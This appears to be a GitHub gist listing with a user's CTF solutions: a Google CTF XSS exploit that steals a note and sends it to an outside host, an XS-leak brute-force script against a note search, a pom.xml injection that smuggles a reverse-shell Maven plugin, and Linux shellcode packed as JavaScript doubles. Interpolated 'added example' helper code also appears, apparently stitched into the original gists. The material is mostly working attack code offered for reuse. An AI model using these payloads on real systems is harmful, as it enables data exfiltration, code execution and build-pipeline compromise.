🚩
Trying harder

s1r1us msrkp
@msrkp
msrkp / exp.html
Created August 24, 2020 01:48
Google CTF All the Little Things solution
<!DOCTYPE html>
<html>
<head>
<script>
// Payload meant to land inside the target page (top). The srcdoc iframes
// inherit the page's origin and CSP, and each loads the /theme JSONP
// endpoint, a script source the target's CSP trusts, which calls the
// attacker-chosen `cb` expression on its data. String.prototype.valueOf()
// returns the string it is called on, so each `cb` turns into an assignment:
//  1. copy the nonce of a <script> in the top document onto the window of
//     the iframe named x (the .nonce IDL getter is readable same-origin);
//  2. set that nonce on the empty <script> in iframe x's head (the .nonce
//     setter updates the element's internal nonce, which is what CSP checks);
//  3. write the fetch-and-exfiltrate code held in iframe y's title attribute
//     into that empty <script> via innerHTML. An empty inline script never
//     gets its "already started" flag set, so the text change re-prepares it
//     and it now runs under the copied nonce.
x= `
<iframe name=x title='fetch(&#x22;/note&#x22;).then(x=>x.text()).then(x=>top.location=&#x22;//ctf.s1r1us.ninja?html=&#x22;+btoa(encodeURIComponent(x)))' id=y srcdoc='<script><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.x.nonce=top.document.body.lastElementChild.firstElementChild.nextElementSibling.nextElementSibling.nextElementSibling.nonce.valueOf ><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.x.document.head.lastElementChild.nonce=top.x.nonce.valueOf ><\/script>'></iframe>
<iframe srcdoc='<script src=https://littlethings.web.ctfcompetition.com/theme?cb=top.x.document.head.lastElementChild.innerHTML=top.y.title.valueOf ><\/script>'></iframe>
@msrkp
msrkp / exp.md
Last active July 30, 2023 15:20
LineCTF - Your Note: script to perform an XS-leak to read the flag.

XS-leak via downloads in headless Chrome.

TL;DR

The app has a note search and a download option: visiting http://34.84.72.167/search?q=LINECTF{&download downloads a JSON file if the value of q occurs in one of the notes.

Downloads do not work in headless Chrome, so a navigation that triggers one fails with an error; whether the navigation errors is the oracle.

oracle

  page.goto(url).then(() => {
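The gist's oracle is cut off after page.goto(url).then(...). As an added example, not the gist's own code, the block below shows how such a download-based oracle is wired into a prefix-extension loop that recovers the note character by character. It assumes the search endpoint and its `&download` switch behave as described above, that Puppeteer's page.goto() rejects with net::ERR_ABORTED when the navigation becomes a download in headless Chrome, and a flag alphabet of lowercase letters, digits, `_` and `}`; the names bruteForceSecret and makeDownloadProbe are mine.

```javascript
// Added example (not the gist's code): the prefix-extension loop that turns a
// yes/no download oracle into a flag reader.  `probe(candidate)` resolves
// true when the candidate string occurs in the victim's note.
async function bruteForceSecret(probe, opts = {}) {
  const {
    prefix = 'LINECTF{',                                   // from the gist's URL
    alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789_}',   // assumed flag charset
    maxLen = 64,
  } = opts;
  let known = prefix;
  while (known.length < maxLen) {
    let extended = false;
    for (const ch of alphabet) {
      if (await probe(known + ch)) {
        known += ch;
        extended = true;
        break;
      }
    }
    if (!extended) throw new Error(`no character matched after ${JSON.stringify(known)}`);
    if (known.endsWith('}')) return known;
  }
  throw new Error(`secret longer than ${maxLen} characters`);
}

// Turns a Puppeteer Page into that probe.  Per the gist, headless Chrome
// cannot complete a download, so a navigation that becomes one makes
// page.goto() reject (Chrome reports it as net::ERR_ABORTED), while a normal
// search results page resolves.  `base` is the challenge host from the gist.
function makeDownloadProbe(page, base = 'http://34.84.72.167') {
  return async (candidate) => {
    const url = `${base}/search?q=${encodeURIComponent(candidate)}&download`;
    try {
      await page.goto(url, { waitUntil: 'domcontentloaded' });
      return false;                                     // rendered: no match
    } catch (err) {
      if (/ERR_ABORTED/.test(String(err))) return true; // download started: match
      throw err;                                        // network trouble, not a signal
    }
  };
}

// Usage with a real browser (puppeteer must be installed):
//   const browser = await puppeteer.launch();
//   const page = await browser.newPage();
//   console.log(await bruteForceSecret(makeDownloadProbe(page)));
```

Only ERR_ABORTED counts as a positive; any other rejection is re-thrown so that a timeout or a dead host cannot be mistaken for a matching character.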
@msrkp
msrkp / sol.md
Last active May 16, 2021 13:36
OMH CTF Solutions

code_review solution

Add a `//` "comment" inside the text node of the plugin configuration in pom.xml. XML has no `//` comments, so everything after it is still parsed: it closes the surefire plugin element and adds a new plugin that executes a reverse shell.

<plugin>
                <groupId>org.apache.maven.plugins</groupId>
                <artifactId>maven-surefire-plugin</artifactId>
                <version>2.22.2</version>
                <configuration> // <forkedProcessTimeoutInSeconds>30</forkedProcessTimeoutInSeconds></configuration></plugin>
 <plugin>
                <groupId>org.codehaus.mojo</groupId>
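As an added example (not part of the gist), here is the check a reviewer could run to see why the `//` trick works: only `<!-- -->` is a comment in XML, so a plugin list extracted from the file still contains the smuggled plugin. The pom fragment is constructed from the lines above; the second plugin's artifactId (`example-plugin`) is a placeholder, and the function names are mine. It is a deliberately small regex scan; a production check should use a real XML parser.

```javascript
// Added example, not from the gist: list the plugins Maven would actually see.
// A "//" inside element text is ordinary character data, so it hides nothing;
// only <!-- ... --> is removed before scanning.

function stripXmlComments(xml) {
  return xml.replace(/<!--[\s\S]*?-->/g, '');
}

function listPlugins(pomXml) {
  const cleaned = stripXmlComments(pomXml);
  const plugins = [];
  const pluginRe = /<plugin>([\s\S]*?)<\/plugin>/g;   // does not match <plugins>
  let m;
  while ((m = pluginRe.exec(cleaned)) !== null) {
    const body = m[1];
    const pick = (tag) => {
      const t = new RegExp(`<${tag}>\\s*([^<]*?)\\s*</${tag}>`).exec(body);
      return t ? t[1] : null;
    };
    plugins.push({ groupId: pick('groupId'), artifactId: pick('artifactId') });
  }
  return plugins;
}

// Plugins whose groupId is not on the reviewer's allow-list.
function unexpectedPlugins(pomXml, allowedGroupIds) {
  const allowed = new Set(allowedGroupIds);
  return listPlugins(pomXml).filter((p) => !allowed.has(p.groupId));
}

// Constructed pom fragment: the surefire plugin with the injected "//" text,
// followed by the smuggled plugin (artifactId is a placeholder).
const INJECTED_POM = `
<project>
  <build>
    <plugins>
      <plugin>
        <groupId>org.apache.maven.plugins</groupId>
        <artifactId>maven-surefire-plugin</artifactId>
        <version>2.22.2</version>
        <configuration> // <forkedProcessTimeoutInSeconds>30</forkedProcessTimeoutInSeconds></configuration></plugin>
      <plugin>
        <groupId>org.codehaus.mojo</groupId>
        <artifactId>example-plugin</artifactId>
      </plugin>
    </plugins>
  </build>
</project>`;

// Same file, but with the second plugin inside a real XML comment.
const COMMENTED_POM = INJECTED_POM
  .replace('</plugin>\n      <plugin>', '</plugin>\n      <!--<plugin>')
  .replace('</plugin>\n    </plugins>', '</plugin>-->\n    </plugins>');

const REVIEW_ALLOWLIST = ['org.apache.maven.plugins'];
```

Running unexpectedPlugins(INJECTED_POM, REVIEW_ALLOWLIST) reports the org.codehaus.mojo plugin, while the same call on COMMENTED_POM reports nothing, which is the difference between a visual "comment" and one the parser honours.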
@msrkp
msrkp / keybase.md
Created August 29, 2021 04:28
keybase.md

Keybase proof

I hereby claim:

  • I am msrkp on github.
  • I am s1r1us (https://keybase.io/s1r1us) on keybase.
  • I have a public key whose fingerprint is 00AD 378C CEB2 0955 8E61 4EED 5386 F2DB 6741 F532

To claim this, I am signing this object:

@msrkp
msrkp / shellcode.js
Created January 9, 2024 14:33
shellcode linux
let shellcode = [2.40327734437787e-310, -1.1389104046892079e-244, 3.1731330715403803e+40, 1.9656830452398213e-236, 1.288531947997e-312, 8.3024907661975715e+270, 1.6469439731597732e+93, 9.026845734376378e-308];
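The array above is raw x86-64 Linux shellcode packed eight bytes at a time into IEEE-754 doubles, the usual way to place bytes into a JavaScript engine's heap or JIT output. As an added example (not part of the gist), the helpers below convert between the two forms, show the packed bytes as hex, and flag the one failure mode of this encoding: an 8-byte chunk that happens to decode as NaN may have its payload canonicalised by the engine. Little-endian byte order is assumed (x86-64); the helper names are mine.

```javascript
// Added example, not from the gist: pack/unpack shellcode as doubles.
// Byte order is little-endian, as on the assumed x86-64 target.

function doublesToBytes(doubles) {
  const buf = new ArrayBuffer(doubles.length * 8);
  const view = new DataView(buf);
  doubles.forEach((d, i) => view.setFloat64(i * 8, d, true));
  return new Uint8Array(buf);
}

function bytesToDoubles(bytes) {
  // Pad to a multiple of 8 with NOPs (0x90) so the last double is complete.
  const padded = new Uint8Array(Math.ceil(bytes.length / 8) * 8).fill(0x90);
  padded.set(bytes);
  const view = new DataView(padded.buffer);
  const out = [];
  for (let off = 0; off < padded.length; off += 8) out.push(view.getFloat64(off, true));
  return out;
}

// Indices of 8-byte chunks that decode to NaN.  Engines may rewrite NaN bit
// patterns when the value passes through a JS number, so such chunks are
// unsafe to smuggle this way and the shellcode should be re-laid-out.
function nanChunks(bytes) {
  return bytesToDoubles(bytes)
    .map((d, i) => (Number.isNaN(d) ? i : -1))
    .filter((i) => i >= 0);
}

function toHex(bytes) {
  return Array.from(bytes, (b) => b.toString(16).padStart(2, '0')).join('');
}

// The gist's array, decoded.
const shellcode = [2.40327734437787e-310, -1.1389104046892079e-244, 3.1731330715403803e+40, 1.9656830452398213e-236, 1.288531947997e-312, 8.3024907661975715e+270, 1.6469439731597732e+93, 9.026845734376378e-308];
const shellcodeBytes = doublesToBytes(shellcode);
console.log(toHex(shellcodeBytes));   // 64 bytes; inspect with e.g. ndisasm -b64
```

Because every double in the gist is a finite number, nanChunks(shellcodeBytes) is empty and the round trip bytes to doubles to bytes is exact; the NaN check is what to run on new shellcode before packing it.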